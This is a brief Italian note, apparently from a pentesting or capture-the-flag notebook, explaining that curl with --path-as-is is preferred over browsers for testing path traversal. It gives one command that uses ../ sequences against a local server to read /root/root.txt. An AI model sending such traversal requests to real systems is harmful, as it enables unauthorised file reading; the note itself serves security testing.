tags : curl curl_path_traversal
Quando si tratta di testare una vulnerabilità di path traversal è sempre meglio utlizzare curl rispetto ai browser perchè non redige nulla, la sintassi da utilizzare è la seguente:
curl --path-as-is http://127.0.0.1:8080/assets/../../../../../root/root.txt